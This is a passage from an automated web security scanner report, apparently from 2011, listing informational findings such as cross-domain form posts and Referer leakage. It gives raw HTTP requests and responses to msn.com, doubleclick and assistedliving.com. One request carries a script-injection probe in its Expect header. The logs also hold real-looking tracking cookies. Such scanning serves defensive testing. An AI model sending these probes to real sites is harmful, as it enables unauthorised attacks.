class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 1,561 others like this.</span><span class="connect_widget_not_connected_text">1561 likes. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to se
...[SNIP]...

Request 2

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.39
X-Cnection: close
Date: Sun, 01 May 2011 23:32:44 GMT
Content-Length: 8565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbded9cc98688250662275" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 1,562 others like this.</span><span class="connect_widget_not_connected_text">1562 likes. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlik
...[SNIP]...

22. Cross-domain POST

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assistedliving.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aplaceformom.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.assistedliving.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private, max-age=7
Expires: Sun, 01 May 2011 23:35:51 GMT
Last-Modified: Sun, 01 May 2011 23:35:41 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 11969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Page Not F
...[SNIP]...
<body id="AssistedLiving-ErrorPage" class="propertyPage homePage var11 plain">
<form method="post" action="http://www.aplaceformom.com/favicon.ico/" id="mainForm">
<div>
...[SNIP]...

23. Cross-domain Referer leakage
There are 78 instances of this issue:


23.1. http://0.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw HTTP/1.1
Host: 0.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://clk.atdmt.com/CNT/go/319741851/direct/01/
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSAnalytics=4vfdfecb2d4c0fa370b4247c7f5ca890fe255a7ff3f2d9c16df515059ba889a2c264247fc67cd3b686d59a9dba96fa20d5fcc7df8948e35cc9d47b74a8b87c97eb3554094c90fb1ce99e4b9ec8be3846abbf8e7ed010; expires=Wed, 15 Jun 2011 23:32:50 GMT; domain=.r.msn.com; path=/; httponly
Date: Sun, 01 May 2011 23:32:50 GMT
Connection: close
Content-Length: 191

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://clk.atdmt.com/CNT/go/319741851/direct/01/">here</A>
</BODY>
</HTML>

23.2. http://0.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /?ld=4vlfimJWHOSoAG3PfwIh_kJRdllL3F5-o10FPT47q_IWBjrLiueJBDF0U5Dwzq7Y6YfLDJpKC4aJkPg0-hN_0iOcr6o2VXRw93vLwE4JgUrgtSouES4BG05tmlYaeWNIB-FrOo2zqN30arps-BmWfevhnAgRBhd2bQ7zCGpjlfyecT0H8nxj98iGp61_TmM6YA_SkkOpef7dME8BPU_6EHXj8nbGt5hYNuj5Kt5DdAZ6kyXNuYJJTw5rUd00d2p8z9RCFd-9LpGJrjOiEvlhyNEf6ZuSftbgFELTnpFC-ug_c1VAlMa4CLF5Vg2fbAn9ODACF2xxAmY3M9WLROFrG9IPaITglXKXQUhGEMFSUJHZKNqN_vjrCmpcs HTTP/1.1
Host: 0.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MSAnalytics=4vdf366c27486a312210d9bfe02dfcb7c0c7bc93eafacfcbd31f0951f45ba5304205585d2fa608d50164a5d568bbff433f1aa4044f42ccf82369e8e7648050910c3554094cdd2e4983fc56d5214bb2e1feda40a83310

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 01 May 2011 23:32:51 GMT
Connection: close
Content-Length: 278

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907">here</A>
...[SNIP]...

23.3. http://1188110.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1188110.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /?ld=4vCHtS_uXEIeo96a3p5ur8EHeK6E2UMMS2W7lvVVqf9k_6OyA1uLOEc_RSovzlSGele_i8oUpTWlxEUal5sKN9XYJRDr8lz8qXyXacB1AVgOENi0_2LjiZcitAhkh4HVfKTfqvGUtT94zc2jM8j-rDjWLK16p15xd37HHeDm02fbhVeYQ2CGNEi2Z-ffIbpb6xdrbLavs7VWl2mJJwMjhvkWqxfQWRvim-AcNJSZ9Dh8LMan_Uhk2ZsYy-QLnVMcZq1wMDg93SjKPG4Pm2PWtPCh8cigXR6sAjkjYXAw9ac5WptSe_2v2xtGp8NowTatUrNVQJTAqhy0D1_1_R0wgjnvJybmAQJmNzPVg9TJ9UUnEt0DGnsIXLqHj2iT1ux4t3VcXvEw0z3qTK HTTP/1.1
Host: 1188110.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MSAnalytics=4vdf366c27486a312210d9bfe02dfcb7c0c7bc93eafacfcbd31f0951f45ba5304205585d2fa608d50164a5d568bbff433f1aa4044f42ccf82369e8e7648050910c3554094cdd2e4983fc56d5214bb2e1feda40a83310

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r?p=7067&t=2&a=31s-2100u&c1=vulnerability management
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSConv=4va5e6de639d56accbb1ed97f6c54c8aa27310e999b329d407a830b846a84681e68a721cceb3999be24ef72b2523b74a4d069b1a142377522b4518e43df690504df34c6a1c45202e9225eccfce06aa5dd8a4f387b24b22c134bf71c97854120943b9c0af30b1828b8d922b29f6ef18039a5638dc9b9a1f0092207a4af6410289b83554094c078414060d2988a62c6b07284cc18f6810; expires=Wed, 15 Jun 2011 23:32:55 GMT; path=/; httponly
Date: Sun, 01 May 2011 23:32:55 GMT
Connection: close
Content-Length: 252

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r?p=7067&t=2&a=31s-2100u&c1=vulnerability management">here</A>
...[SNIP]...

23.4. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B074379b21fb9e765%3B12fae6cbe08,0%3B%3B%3B1478067860,i95YAOw1FwASSlUAAAAAAOsoEwAAAAAAAAAAAAIAAAAAAAsAAQABFeohJAAAAAAAzy0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASEg8AAAAAAAIAAgAAAAAAB75sri8BAAAAAAAAADg5YmU4OGY2LTc0NWYtMTFlMC04NTc1LTAwMzA0OGQ3MjU5NgA4nyoAAAA=,,http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml,;ord=1304301452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?i95YAOw1FwASSlUAAAAAAOsoEwAAAAAAAAAAAAIAAAAAAAsAAQABFeohJAAAAAAAzy0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASEg8AAAAAAAIAAgAAAAAA13-dmzYzH0DXf52bNjMfQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtSm.pCvQGCiKM6CiSfw5MkV5RbarJNfJKETvoAAAAAA==,,http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml,Z%3D300x250%26s%3D1521132%26_salt%3D2512947330%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.japanator.com%252Felephant%252Fsignup.phtml%26r%3D1,89be88f6-745f-11e0-8575-003048d72596
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 01:57:34 GMT
Content-Length: 855

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ads.bluelithium.com/clk?2,13%3B074379b21fb9e765%3B12fae6cbe08,0%3B%3B%3B1478067860,i95YAOw1FwASSlUAAAAAAOsoEwAAAAAAAAAAAAIAAAAAAAsAAQABFeohJAAAAAAAzy0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASEg8AAAAAAAIAAgAAAAAAB75sri8BAAAAAAAAADg5YmU4OGY2LTc0NWYtMTFlMC04NTc1LTAwMzA0OGQ3MjU5NgA4nyoAAAA=,,http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml,http://ad.doubleclick.net/click;h=v8/3afb/c/181/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

23.5. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaabd%3B12fade8e939,0%3B%3B%3B4257954862,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAOOnorS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,;ord=1304292813? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:34:26 GMT
Content-Length: 1180

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaabd%3B12fade8e939,0%3B%3B%3B4257954862,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAOOnorS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,http://ad.doubleclick.net/click;h=v8/3afa/c/2c6/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

23.6. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:33:30 GMT
Content-Length: 1041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*http://ad.doubleclick.net/click;h=v8/3afa/4/20d/%2a/h;234033313;1-0;0;57879586;238-150/30;39925623/39943410/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/welcome/whychooseetrade?SC=S047401&ch_id=D&s_id=YHOO&c_id=LGSTDBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_LogoTextPO_No_150x30.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

23.7. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

